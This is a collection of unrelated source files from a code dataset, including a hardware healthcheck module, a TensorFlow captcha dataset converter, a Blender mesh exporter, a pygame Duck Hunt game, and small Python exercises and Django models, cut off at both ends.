!= 0:\r\n logger.error(\"Unable to get the system's processor type.\\n\" + err)\r\n resultDict['errorMessages'].append(\"Unable to get the system's processor type.\")\r\n return resultDict\r\n logger.debug(\"The compute node's processor type was determined to be: \" + processorType + '.')\r\n self.computeNodeDict['processorType'] = processorType\r\n try:\r\n if not checkFusionIOFirmwareUpgradeSupport(self.healthResourceDict['fusionIOFirmwareVersionList'], self.loggerName):\r\n resultDict['errorMessages'].append('The fusionIO firmware is not at a supported version for an automatic upgrade.')\r\n return resultDict\r\n except KeyError as err:\r\n logger.error('The resource key (' + str(err) + ') was not present in the resource file.')\r\n resultDict['errorMessages'].append('A resource key error was encountered.')\r\n return resultDict\r\n\r\n if not updateOSHarddrives:\r\n result = self.__checkDrivers(computeNodeResources, systemModel, osDistLevel)\r\n if result != '':\r\n resultDict['errorMessages'].append(result)\r\n return resultDict\r\n try:\r\n if systemModel == 'DL580G7' or systemModel == 'DL980G7':\r\n computeNodeInventory = Gen1ScaleUpComputeNodeInventory(self.computeNodeDict.copy(), self.healthResourceDict['noPMCFirmwareUpdateModels'], computeNodeResources, self.healthResourceDict.copy())\r\n else:\r\n computeNodeInventory = ComputeNodeInventory(self.computeNodeDict.copy(), self.healthResourceDict['noPMCFirmwareUpdateModels'], computeNodeResources, self.healthResourceDict.copy())\r\n except KeyError as err:\r\n logger.error('The resource key (' + str(err) + ') was not present in the resource file.')\r\n resultDict['errorMessages'].append('A resource key error was encountered.')\r\n return resultDict\r\n\r\n if not updateOSHarddrives:\r\n computeNodeInventory.getComponentUpdateInventory()\r\n else:\r\n computeNodeInventory.getLocalHardDriveFirmwareInventory()\r\n if computeNodeInventory.getInventoryStatus():\r\n resultDict['errorMessages'].append(\"Errors were encountered during the compute node's inventory.\")\r\n return resultDict\r\n if versionInformationLogOnly:\r\n if os.path.isfile(self.versionInformationLog):\r\n try:\r\n shutil.copy(self.versionInformationLog, self.healthBasePath)\r\n except IOError as err:\r\n self.logger.error('I/O Error while copy of ' + self.versionInformationLog + ' to ' + self.healthBasePath)\r\n\r\n return resultDict\r\n componentUpdateDict = computeNodeInventory.getComponentUpdateDict()\r\n if updateOSHarddrives:\r\n self.computeNodeDict['componentUpdateDict'] = len(componentUpdateDict['Firmware']) != 0 and componentUpdateDict\r\n resultDict['updateNeeded'] = True\r\n else:\r\n componentDictSizes = [ len(dict) for dict in componentUpdateDict.values() ]\r\n if any((x != 0 for x in componentDictSizes)):\r\n self.computeNodeDict['componentUpdateDict'] = componentUpdateDict\r\n resultDict['updateNeeded'] = True\r\n if 'FusionIO' in componentUpdateDict['Firmware']:\r\n self.computeNodeDict['busList'] = computeNodeInventory.getFusionIOBusList()\r\n self.computeNodeDict['externalStoragePresent'] = computeNodeInventory.isExternalStoragePresent()\r\n return resultDict\r\n\r\n def __checkDrivers(self, computeNodeResources, systemModel, osDistLevel):\r\n errorMessage = ''\r\n logger = logging.getLogger(self.loggerName)\r\n driversFound = False\r\n started = False\r\n mlnxDriverFound = False\r\n for data in computeNodeResources:\r\n data = data.replace(' ', '')\r\n if re.match('^#', data):\r\n continue\r\n if not re.match('^Drivers:\\\\s*$', data) and not driversFound:\r\n continue\r\n elif 'Drivers' in data:\r\n driversFound = True\r\n continue\r\n elif osDistLevel in data and not systemModel in data and not started:\r\n continue\r\n elif osDistLevel in data and systemModel in data:\r\n started = True\r\n continue\r\n elif re.match('\\\\s*$', data):\r\n break\r\n else:\r\n computeNodeDriverList = data.split('|')\r\n computeNodeDriver = computeNodeDriverList[0]\r\n command = 'modinfo ' + computeNodeDriver\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to check if the ' + computeNodeDriver + ' driver is loaded was: ' + out.strip())\r\n if result.returncode != 0:\r\n if (computeNodeDriver == 'mlx4_en' or computeNodeDriver == 'mlnx') and not mlnxDriverFound:\r\n mlnxDriverFound = True\r\n continue\r\n logger.error('The ' + computeNodeDriver + ' driver does not appear to be loaded.\\n' + err)\r\n errorMesssage = 'The ' + computeNodeDriver + ' driver does not appear to be loaded.'\r\n return errorMessage\r\n\r\n if systemModel == 'DL580G7' or systemModel == 'DL980G7':\r\n command = 'modinfo iomemory_vsl'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to check if the iomemory_vsl driver is loaded was: ' + out.strip())\r\n if result.returncode != 0:\r\n logger.error('The iomemory_vsl driver does not appear to be loaded.\\n' + err)\r\n errorMessage = 'The iomemory_vsl driver does not appear to be loaded.'\r\n return errorMessage\r\n\r\n def getComputeNodeDict(self):\r\n return self.computeNodeDict","sub_path":"healthcheck/health1.0-0.sles11/bin/modules/computeNode.py","file_name":"computeNode.py","file_ext":"py","file_size_in_byte":20254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"73607455","text":"import tensorflow as tf\nimport numpy as np\nfrom PIL import Image\nimport os\nimport random\nimport sys\n\n# 验证集数量\n_NUM_TEST = 500\n# 随机种子\n_RANDOM_SEED = 0\n# 数据集路径\nDATASET_DIR = '/Users/mobvoi/workspace/code/generate_chapter'\n# DATASET_DIR = '/Users/knight/Desktop/mobvoi/valid_code/my_code'\n# tfrecord文件存放路径\nTFRECORD_DIR = './image/tfrecord/'\n\n\n# 判断tfrecord文件是否存在\ndef _dataset_exists(dataset_dir):\n for split_name in ['train', 'test']:\n output_filename = os.path.join(dataset_dir, split_name + 'tfrecords')\n if not tf.io.gfile.exists(output_filename):\n return False\n return True\n\n\n# 获取所有验证码图片\ndef _get_filenames_and_classes(dataset_dir):\n photo_filenames = []\n for filename in os.listdir(dataset_dir):\n # 获取文件路径\n path = os.path.join(dataset_dir, filename)\n photo_filenames.append(path)\n return photo_filenames\n\n\ndef int64_feature(values):\n if not isinstance(values, (tuple, list)):\n values = [values]\n return tf.train.Feature(int64_list=tf.train.Int64List(value=values))\n\n# # xk start\n# def str_feature(values):\n# if not isinstance(values, (tuple, list)):\n# values = [values]\n# return tf.train.Feature(int64_list=tf.train.Int64List(value=values))\n# # xk end\n\n\ndef bytes_feature(values):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[values]))\n\n\ndef image_to_tfexample(image_data, label0, label1, label2, label3):\n return tf.train.Example(features=tf.train.Features(feature={\n 'image': bytes_feature(image_data),\n 'label0': int64_feature(label0),\n 'label1': int64_feature(label1),\n 'label2': int64_feature(label2),\n 'label3': int64_feature(label3),\n }))\n\n\n# 数据转化为tfrecord格式\ndef _convert_dataset(split_name, filenames, dataset_dir):\n assert split_name in ['train', 'test']\n\n with tf.Session() as sess:\n # 定义tfrecord文件的路径和名字\n output_filename = os.path.join(TFRECORD_DIR, split_name + '.tfrecords')\n with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:\n for i, filename in enumerate(filenames):\n try:\n sys.stdout.write('\\r>>转换图片 %d / %d' % (i + 1, len(filenames)))\n sys.stdout.flush()\n\n # 读取图片\n image_data = Image.open(filename)\n # 根据模型结构resize\n image_data = image_data.resize((224, 224))\n # 灰度化\n image_data = np.array(image_data.convert('L'))\n # 将图片转换为bytes\n image_data = image_data.tobytes()\n\n # 获取lables\n labels = filename.split('/')[-1][0:4]\n num_labels = []\n for j in range(4):\n num_labels.append(int(labels[j]))\n # num_labels.append(ord(labels[j]))\n\n # 生成protocol数据类型\n example = image_to_tfexample(image_data, num_labels[0], num_labels[1], num_labels[2], num_labels[3])\n tfrecord_writer.write(example.SerializeToString())\n\n except IOError as e:\n print('\\n不能读取:', filename)\n print('Error:', e)\n print('跳过 \\n')\n sys.stdout.write('\\n') # 和print是一个意思\n sys.stdout.flush() # 一秒显示一次结果,一般都是程序执行完才显示结果\n\n\n# 判断tfrecord文件是否存在\nif _dataset_exists(DATASET_DIR):\n print('file already exists')\nelse:\n # 获得所有图片\n photo_filenames = _get_filenames_and_classes(DATASET_DIR)\n\n # 把数据分为测试集和训练集,并且打乱\n random.seed(_RANDOM_SEED)\n random.shuffle(photo_filenames)\n training_filenames = photo_filenames[_NUM_TEST:]\n testing_filenames = photo_filenames[:_NUM_TEST]\n\n # 数据转换为tfrecord\n _convert_dataset('train', training_filenames, DATASET_DIR)\n _convert_dataset('test', testing_filenames, DATASET_DIR)\n print('-------------生成tfrecord文件结束------------------')\n","sub_path":"work_captcha_recognition/tfrecord/tfrecord_model_train/03_save_as_tfrecord.py","file_name":"03_save_as_tfrecord.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"133481850","text":"import bpy\nimport bmesh\nimport struct\nimport json\n\n\ndef write_mesh_file(blender_object, write_dir):\n try:\n if len(blender_object.modifiers) > 0:\n mesh = blender_object.to_mesh(scene=bpy.context.scene,\n apply_modifiers=True,\n settings='PREVIEW')\n name = blender_object.name\n else:\n mesh = blender_object.data\n\n #Todo fix mesh sharing!\n #name = mesh.name\n name = blender_object.name\n\n mesh_type = blender_object.data.get(\"mesh_type\")\n except:\n raise RuntimeError(\"Error in object \" + blender_object.name)\n\n if mesh_type != \"none\":\n filename = write_dir + '/' + name + \".mesh\"\n\n print('Exporting: ' + filename)\n print(mesh_type)\n\n bm = bmesh.new()\n bm.from_mesh(mesh)\n\n bmesh.ops.triangulate(bm, faces=bm.faces, quad_method=2)\n\n indices = []\n positions = []\n normals = []\n texture_uvs = []\n lightmap_uvs = []\n\n if len(mesh.uv_layers) >= 2:\n texture_uv_layer = bm.loops.layers.uv[\"texture\"]\n lightmap_uv_layer = bm.loops.layers.uv[\"lightmap\"]\n\n for face in bm.faces:\n for loop in face.loops:\n texture_uv = loop[texture_uv_layer].uv\n texture_uv.y = 1.0 - texture_uv.y\n lightmap_uv = loop[lightmap_uv_layer].uv\n lightmap_uv.y = 1.0 - lightmap_uv.y\n vert = loop.vert\n positions.append(vert.co.to_tuple())\n normals.append(vert.normal.to_tuple())\n texture_uvs.append(texture_uv.to_tuple())\n lightmap_uvs.append(lightmap_uv.to_tuple())\n else:\n raise Exception(mesh.name + \" must have two uv layers. With names texture and lightmap. \")\n bm.free()\n del bm\n\n mesh_file = open(filename, 'bw')\n\n # Header\n mesh_file.write(struct.pack('i', len(positions)))\n mesh_file.write(struct.pack('i', len(indices)))\n\n # Body\n for v in zip(positions, normals, texture_uvs, lightmap_uvs):\n mesh_file.write(struct.pack('fff', *v[0]))\n mesh_file.write(struct.pack('fff', *v[1]))\n mesh_file.write(struct.pack('ff', *v[2]))\n mesh_file.write(struct.pack('ff', *v[3]))\n\n for i in indices:\n mesh_file.write(struct.pack('I', i))\n\n mesh_file.close()\n\n\ndef write(write_dir, objects):\n scene = bpy.context.scene\n\n objects = [o for o in objects if o.type == 'MESH']\n\n for blender_object in objects:\n write_mesh_file(blender_object, write_dir)\n print(\"Object: \" + blender_object.name)\n if blender_object.find_armature():\n armature = blender_object.find_armature()\n for action in bpy.data.actions:\n animation = dict()\n animation[\"frame_rate\"] = scene.render.fps\n animation[\"keyframes\"] = list()\n armature.animation_data.action = action\n for index in range(scene.frame_start, scene.frame_end + 1, 5):\n scene.frame_set(index)\n mesh_name = blender_object.name + \"_\" + action.name.lower() + \"_\" + str(index) + \".mesh\"\n write_mesh_file(blender_object, write_dir + '/' + mesh_name)\n animation[\"keyframes\"].append({\"key\": index, \"mesh\": mesh_name})\n\n animation_file = open(write_dir + '/' + blender_object.name + \"_\" + action.name.lower() + \".animation\", 'w')\n animation_file.write(json.dumps(animation))\n animation_file.close()\n\n\n\n","sub_path":"meshes.py","file_name":"meshes.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"343784440","text":"from lyza.analytic_solution import get_analytic_solution_vector\nfrom lyza.solver import apply_bcs, solve_scipy_sparse\nfrom lyza.function import Function\nfrom lyza.vtk import VTKFile\nimport logging\nimport numpy as np\nimport progressbar\n\n\ndef time_array(t_init, t_max, delta_t):\n result = [t_init]\n\n while result[-1] < t_max:\n result.append(result[-1] + delta_t)\n\n return result\n\n\ndef implicit_euler(\n m_form, a_form, b_form, dirichlet_bcs, u0_function, t_array, out_prefix=None\n):\n\n mesh = a_form.mesh\n function_size = a_form.function_size\n node_dofs = a_form.node_dofs\n\n A = a_form.assemble()\n M = m_form.assemble()\n\n u = Function(mesh, function_size)\n u.set_analytic_solution(u0_function)\n\n solution_vector = u.vector\n previous_solution_vector = None\n\n bar = progressbar.ProgressBar(max_value=len(t_array))\n\n if out_prefix:\n # u.set_vector(solution_vector)\n u.set_label(\"u\")\n ofile = VTKFile(\"%s%05d.vtk\" % (out_prefix, 0))\n ofile.write(mesh, u)\n\n for i in range(1, len(t_array)):\n t = t_array[i]\n delta_t = t_array[i] - t_array[i - 1]\n\n b_form.set_time(t)\n b = b_form.assemble()\n matrix = M + delta_t * A\n vector = M.dot(solution_vector) + delta_t * b\n\n for bc in dirichlet_bcs:\n bc.set_time(t)\n\n matrix_bc, vector_bc = apply_bcs(\n matrix, vector, mesh, node_dofs, function_size, dirichlet_bcs\n )\n # matrix_bc, vector_bc = apply_bcs(matrix, vector, u.function_space, dirichlet_bcs)\n previous_solution_vector = solution_vector\n solution_vector = solve_scipy_sparse(matrix_bc, vector_bc)\n\n if out_prefix:\n u.set_vector(solution_vector)\n ofile = VTKFile(\"%s%05d.vtk\" % (out_prefix, i))\n ofile.write(mesh, u)\n\n bar.update(i + 1)\n # logging.info('T = %f'%(t))\n bar.finish()\n\n u.set_vector(solution_vector)\n f = Function(mesh, function_size)\n f.set_vector(\n 1.0 / delta_t * M.dot(solution_vector - previous_solution_vector)\n + A.dot(solution_vector)\n )\n\n return u, f\n","sub_path":"lyza/time_integration.py","file_name":"time_integration.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"623144679","text":"import os\nimport random\nimport time\n\nimport pygame\nfrom helpers import AAfilledRoundedRect\n\n\nclass Settings:\n change_time = 1\n change_randomized = 0.2\n\n\nclass Image(pygame.sprite.Sprite):\n def __init__(self, image_files, left=0, top=0, scale=None):\n super().__init__()\n self.images = [pygame.image.load(image_file) for image_file in image_files]\n self.image = self.images[0]\n if scale:\n self.images = [pygame.transform.scale(image, scale) for image in self.images]\n self.rect = self.image.get_rect()\n self.rect.left = left\n self.rect.top = top\n\n\nclass GameBoard(Image):\n background = Image(['Sprites/background_cut.png'])\n size = width, height = 599, 468\n display_surf = pygame.display.set_mode(size, pygame.HWSURFACE | pygame.DOUBLEBUF)\n\n @staticmethod\n def render():\n GameBoard.display_surf.blit(GameBoard.background.image, (0, 0))\n myfont = pygame.font.Font('Sprites/duckhunt.ttf', 16)\n text = 'R = {}'.format(Game.round_count)\n textsurface = myfont.render(text, False, (0, 255, 0), (0, 0, 0))\n GameBoard.display_surf.blit(textsurface, (55, 384))\n AAfilledRoundedRect(GameBoard.display_surf, (50, 410, 62, 42), 'green', )\n AAfilledRoundedRect(GameBoard.display_surf, (51, 411, 60, 40), 'black', )\n AAfilledRoundedRect(GameBoard.display_surf, (145, 410, 252, 42), 'green', )\n AAfilledRoundedRect(GameBoard.display_surf, (146, 411, 250, 40), 'black', )\n AAfilledRoundedRect(GameBoard.display_surf, (440, 410, 110, 42), 'green', )\n AAfilledRoundedRect(GameBoard.display_surf, (441, 411, 108, 40), 'black', )\n pygame.display.update()\n\n\nclass Cursor(Image):\n def __init__(self):\n super().__init__(['Sprites/cursor.png'], left=500, top=350) # TODO\n # Load gunshot sound\n self.gunShotSound = pygame.mixer.Sound(os.path.join(os.getcwd(), 'Sounds', 'shot.wav'))\n # Hide mouse\n pygame.mouse.set_visible(False)\n self.clicked = False\n\n def update(self):\n mouse_x, mouse_y = pygame.mouse.get_pos()\n self.rect.left = mouse_x - self.rect.size[0] / 2\n self.rect.top = mouse_y - self.rect.size[1] / 2\n\n def on_click(self):\n self.gunShotSound.play()\n\n\nclass Dog(Image):\n def __init__(self):\n # TODO: różne pieski\n super().__init__(['Sprites/dog.PNG', 'Sprites/dog_laugh.PNG'], left=500, top=350)\n self.image.set_colorkey(self.image.get_at((0, 0)), pygame.constants.RLEACCEL)\n self.dogWinSound = pygame.mixer.Sound(os.path.join(os.getcwd(), 'Sounds', 'howlovely.wav'))\n self.dogLoseSound = pygame.mixer.Sound(os.path.join(os.getcwd(), 'Sounds', 'eve.oga'))\n\n def celebration(self, cel_type):\n GameBoard.display_surf.blit(GameBoard.background.image, (0, 0))\n if cel_type == 'win':\n self.dogWinSound.play()\n GameBoard.display_surf.blit(self.image, self.rect)\n elif cel_type == 'loss':\n self.image = self.images[1]\n self.dogLoseSound.play()\n GameBoard.display_surf.blit(self.image, self.rect)\n pygame.display.update()\n\n\nclass Duck(Image):\n def __init__(self, duck_type, level_no):\n ducks = {'ola': 'blue',\n 'korwin': 'blue',\n 'lysy': 'red',\n 'janek': 'black'\n }\n # Point Values Based On Duck Color\n point_values = {\"blue\": 1000, \"red\": 1500, \"black\": 500} # TODO zależnie od levelu się zmienia\n self.scale = (54, 57)\n super().__init__(['Sprites/{}/duck1.png'.format(ducks[duck_type])], left=250, top=200, scale=self.scale)\n self.image.set_colorkey(self.image.get_at((0, 0)), pygame.constants.RLEACCEL)\n self.velocity = 1 # TODO zależne od lvl\n self.velocity_dead = 5\n self.alive = True\n self.duck_gone = False\n self.direction = (1, 0)\n self.last_change_time = time.time()\n\n def change_direction(self):\n direction_x = random.choice([-1, 1])\n direction_y = random.choice([-1, 0, 1])\n change_time = time.time() - self.last_change_time\n if not Subround.playground.contains(self.rect):\n if self.rect.left <= Subround.playground.left:\n direction_x = 1\n elif self.rect.right >= Subround.playground.right:\n direction_x = -1\n if self.rect.top <= Subround.playground.top:\n direction_y = random.choice([0, 1])\n elif self.rect.bottom >= Subround.playground.bottom:\n direction_y = random.choice([-1, 0])\n elif change_time > Settings.change_time and random.random() < Settings.change_randomized:\n self.last_change_time = time.time()\n else:\n return\n self.direction = (direction_x, direction_y)\n\n def update(self):\n if self.alive:\n self.update_alive()\n else:\n self.update_dead()\n\n def update_alive(self):\n self.rect.left += self.velocity * self.direction[0]\n self.rect.top += self.velocity * self.direction[1]\n self.change_direction()\n\n def update_dead(self):\n self.rect.top += self.velocity_dead\n if self.rect.bottom >= Subround.playground.bottom:\n self.duck_gone = True\n\n def on_click(self):\n if self.rect.collidepoint(pygame.mouse.get_pos()):\n self.alive = False\n\n\nclass Subround:\n playground = pygame.Rect(0, 0, 599, 302)\n\n def __init__(self):\n self._running = True\n self.duck_count = 2\n self.shots_left = 3\n self.countdown = 10\n self.crosshair = Cursor()\n self.duck = Duck('janek', 1) # TODO random\n self.dog = Dog()\n self.ducks_shot = 0\n self.start_time = time.time()\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONUP:\n self.shots_left -= 1\n self.crosshair.on_click()\n self.duck.on_click()\n if event.type == pygame.MOUSEMOTION:\n self.crosshair.update()\n\n def on_loop(self):\n self.crosshair.update()\n self.duck.update()\n if self.duck.duck_gone:\n self.ducks_shot += 1\n self.subround_end('win')\n elif self.shots_left <= 0 or time.time() - self.start_time > 7: # TODO variable\n self.subround_end('loss')\n\n def on_render(self):\n GameBoard.render()\n GameBoard.display_surf.blit(self.duck.image, self.duck.rect)\n if self.duck.alive:\n GameBoard.display_surf.blit(self.crosshair.image, self.crosshair.rect)\n pygame.display.update()\n\n def on_execute(self):\n self._running = True\n while self._running:\n for event in pygame.event.get():\n self.on_event(event)\n self.on_loop()\n self.on_render()\n return self.ducks_shot\n\n def subround_end(self, end_type):\n self.dog.celebration(end_type)\n time.sleep(2)\n self._running = False\n\n\nclass Round:\n ROUNDS = 2\n MIN_SUCCESS_COUNT = 0 # TODO: minimalna liczba kaczek do zastrzelenia ma rosnąć wraz z rundą\n\n def execute(self):\n ducks_shot = 0\n for i in range(self.ROUNDS):\n subround = Subround()\n ducks_shot += subround.on_execute()\n return self.end_round(ducks_shot >= self.MIN_SUCCESS_COUNT)\n\n def end_round(self, is_win):\n myfont = pygame.font.SysFont('Comic Sans MS', 50)\n text = 'Round won!' if is_win else 'Round lost!'\n textsurface = myfont.render(text, False, (0, 0, 0))\n GameBoard.display_surf.blit(textsurface, (100, 100))\n pygame.display.update()\n time.sleep(1)\n return is_win\n\n\nclass Game:\n round_count = 0\n _running = True\n\n def on_init(self):\n pygame.mixer.pre_init(22050, -16, 2, 1024)\n pygame.init()\n pygame.font.init()\n pygame.mixer.quit()\n pygame.mixer.init(22050, -16, 2, 1024)\n pygame.display.set_caption('Dudu Hunt')\n return True\n\n @staticmethod\n def cleanup():\n # TODO display game over\n # TODO go to start screen?\n pygame.quit()\n\n def render(self):\n pass\n # TODO display round number\n # TODO display shots left\n # TODO display ducks hit + timer\n # TODO display score\n\n def execute(self):\n if not self.on_init():\n self._running = False\n\n while self._running:\n self.round_count += 1\n self.render()\n game_round = Round()\n round_result = game_round.execute()\n self._running = round_result\n self.cleanup()\n\n\nif __name__ == \"__main__\":\n theApp = Game()\n theApp.execute()\n","sub_path":"DuduHunt.py","file_name":"DuduHunt.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"364562685","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\nclass SinglyLinkedListNode:\n def __init__(self, node_data):\n self.data = node_data\n self.next = None\n\nclass SinglyLinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def insert_node(self, node_data):\n node = SinglyLinkedListNode(node_data)\n\n if not self.head:\n self.head = node\n else:\n self.tail.next = node\n\n\n self.tail = node\n\ndef print_singly_linked_list(node, sep, fptr):\n while node:\n fptr.write(str(node.data))\n\n node = node.next\n\n if node:\n fptr.write(sep)\n\n# Complete the findMergeNode function below.\n\n#\n# For your reference:\n#\n# SinglyLinkedListNode:\n# int data\n# SinglyLinkedListNode next\n#\n#\ndef findMergeNode(head1, head2):\n ''' Given two linked lists, it returns the value of the node where the two lists join (they both point to the same node reference)\n\n '''\n\n visited_nodes1 = []\n visited_nodes2 = []\n\n while head1 is not None or head2 is not None:\n if head1 is not None:\n visited_nodes1.append(head1)\n \n if head1 in visited_nodes2:\n return head1.data\n\n head1 = head1.next\n\n if head2 is not None:\n visited_nodes2.append(head2)\n\n if head2 in visited_nodes1:\n return head2.data\n \n head2 = head2.next\n \n return -1\n\n","sub_path":"app/data_structures/linkedlist/find_merge_point.py","file_name":"find_merge_point.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"164718520","text":"import re\n\nn = int(input())\nattacked_and_destroyed_planets = {\"A\": [], \"D\": []}\n\nfor _ in range(n):\n encrypted_message = input()\n letters = [\"s\", \"t\", \"a\", \"r\"]\n matches = [char for char in encrypted_message.lower() if char in letters]\n\n key = len(matches)\n decrypted_message = \"\"\n\n for char in encrypted_message:\n ascii_value = ord(char) - key\n decrypted_message += chr(ascii_value)\n\n pattern = r\"@(?P[A-Za-z]+)[^@\\-!:>]*:(?P\\d+)[^@\\-!:>]*!(?P[AD])![^@\\-!:>]*->(?P\\d+)\"\n planet_data = re.search(pattern, decrypted_message)\n\n if planet_data: # if valid\n planet_name = planet_data[\"name\"]\n attack_type = planet_data[\"attack\"]\n\n if attack_type == \"A\":\n attacked_and_destroyed_planets[\"A\"] += [planet_name]\n elif attack_type == \"D\":\n attacked_and_destroyed_planets[\"D\"] += [planet_name]\n\n\nfor attack_type, planet_names in attacked_and_destroyed_planets.items():\n if attack_type == \"A\":\n print(f\"Attacked planets: {len(planet_names)}\")\n for planet in sorted(planet_names):\n print(f\"-> {planet}\")\n\n elif attack_type == \"D\":\n print(f\"Destroyed planets: {len(planet_names)}\")\n for planet in sorted(planet_names):\n print(f\"-> {planet}\")\n\n","sub_path":"18. Regular Expressions - Exercise/more_ex_03_star_engima.py","file_name":"more_ex_03_star_engima.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"371054529","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport MySQLdb\n\n# 打开数据库连接\ndb = MySQLdb.connect(\"tx.3cat.top\",\"root\",\"123\",\"minsu\",3306)\n# 使用cursor()方法获取操作游标\ncursor = db.cursor()\n# 使用execute方法执行SQL语句\ncursor.execute(\"SELECT id,value FROM PropertyValue\")\n# 使用 fetchone() 方法获取一条数据\n# 使用 fetchall() 方法获取所有数据\ndata = cursor.fetchall()\nfor my_tuple in data:\n id_ = my_tuple[0]\n value_ = '好'\n sql ='UPDATE PropertyValue SET value=\"%s\" WHERE id=%d' % (value_,id_)\n try:\n cursor.execute(sql)\n db.commit()\n except:\n db.rollback()\n print(sql)\n\n# 关闭数据库连接\ndb.close()\nprint(\"Change OK!\")\n","sub_path":"database/change_dbvalue.py","file_name":"change_dbvalue.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"217305293","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurrences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. It cannot contain any loops.\n'''\n\n# # --> this is how i originally did it until i saw 'single-parameter' constraint above\n# def count_th(word, counter = 0):\n# word_length = len(word)\n# if word_length <= 1: # base-case: stop when word_length <= 1 (b/c 'th' is two characters)\n# return counter\n# if word[:2] == \"th\":\n# counter += 1\n# return count_th(word[1:], counter)\n\n# # --> another way to do it? ... using baked in count()\n# def count_th(word):\n# return word.count('th')\n\nword1 = 'thasnthadnth'\nword2 = '1231241'\n\ndef count_th(word):\n if len(word) <= 1: # base-case: stop when word_length <= 1 (b/c 'th' is two characters)\n return 0\n # if first two letters we are looking at are 'th'\n # --> return '1' (because 'th' occurs there)\n # --> plus recursively run count_th on rest of word\n # --> starting at index 2 bc we know word[1] is 'h'\n if word[0:2] == 'th':\n return 1 + count_th(word[2:])\n else: # 'th' does not occur at word[0] - word[1], so start again at word[1]\n return count_th(word[1:])\n\n\n\nprint(count_th(word1), count_th(word2)) # should be --> 3 0 ","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"29226753","text":"# -*- coding: UTF-8 -*-\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.forms.models import model_to_dict\nfrom random import randint\nimport json\n\ncombinations = 1024\n\nclass Config(models.Model):\n\t\n\t\"We support 2 types of experiment\"\n\t\n\texperimentTypeChoices = (\n\t\t( 1, u'Bez sprzężenia zwrotnego'),\n\t\t( 2, u'Ze sprzężeniem zwrotnym'),\n\t)\n\t\n\texperimentType = models.IntegerField(choices = experimentTypeChoices, default = 2)\n\n\t\"Without feedback type options\"\n\t\n\twithoutFeedbackDisplayChoices = (\n\t\t( 1, u'Ograniczony czas wyświetlania'),\n\t\t( 2, u'Wyswietlanie z opóźnieniem'),\n\t)\n\t\n\twithoutFeedbackDisplayTime = models.IntegerField(choices = withoutFeedbackDisplayChoices, default = 1)\n\t\n\twithoutFeedbackDisplayFixedTime = models.IntegerField(default = 1000)\n\t\n\twithoutFeedbackDisplayUserDependentTime = models.IntegerField(default = 1000)\n\n\t\"With feedback type options\"\n\t\n\twithFeedbackErrorDisplayChoices = (\n\t\t( 1, u'Brak reakcji'),\n\t\t( 2, u'Zapal lampke na czerwono'),\n\t\t( 3, u'Zapal lampke i sygnał dźwiękowy'),\n\t)\n\t\n\twithFeedbackErrorDisplay = models.IntegerField(choices = withFeedbackErrorDisplayChoices, default = 2)\n\t\n\twarmupDuration = models.IntegerField(default = 2)\n\nclass ExperimentHistory(models.Model):\n\t\n user = models.ForeignKey(User)\n\t\n config = models.ForeignKey(Config)\n \n def nextCombination(self):\n \n done = self.combinationstatistics_set.all()\n \n toDraw = set()\n for i in range(1, combinations):\n toDraw.add(i)\n for task in done:\n toDraw.remove(task.combination)\n toDraw = list(toDraw)\n \n return toDraw[randint(0, len(toDraw) - 1)]\n \n def isFinished(self):\n if ( self.combinationstatistics_set.all().__len__ == 1023):\n return True\n return False\n \n \nclass CombinationStatistics(models.Model):\n\t\n combination = models.IntegerField()\n\t\n answer = models.CharField(max_length = 1000)\n\t\n experiment = models.ForeignKey(ExperimentHistory)\n \n def getCombinationTableString(self):\n ans = [0,0,0,0,0,0,0,0,0,0]\n number = self.combination\n it = 0\n while (number > 0 and it < 10):\n if (number % 2 != 0):\n ans[it] = 1\n number = number / 2\n it = it + 1\n return str(ans).replace(\" \", \"\")\n\nclass TrainingStatus(models.Model):\n \n combinationsLeft = models.IntegerField(default = 0)\n \n user = models.ForeignKey(User)\n\nclass Key(models.Model):\n\n\tnumber = models.IntegerField(unique = True)\n\t\n\thotkey = models.CharField(max_length = 1)\n\ndef giveResearchData(user):\n \n experiments = user.experimenthistory_set.all()\n for experiment in experiments:\n if (not experiment.isFinished()):\n return {'config': json.dumps(model_to_dict(experiment.config)),\n 'config_m': experiment.config,\n 'combination': experiment.nextCombination()}\n config = None\n if (not experiments):\n config = Config.objects.order_by('-id')[0]\n TrainingStatus(combinationsLeft = config.warmupDuration, user = user).save()\n else:\n config = experiments[0].config\n newExperiment = ExperimentHistory(user = user, config = config)\n newExperiment.save()\n return {'config': 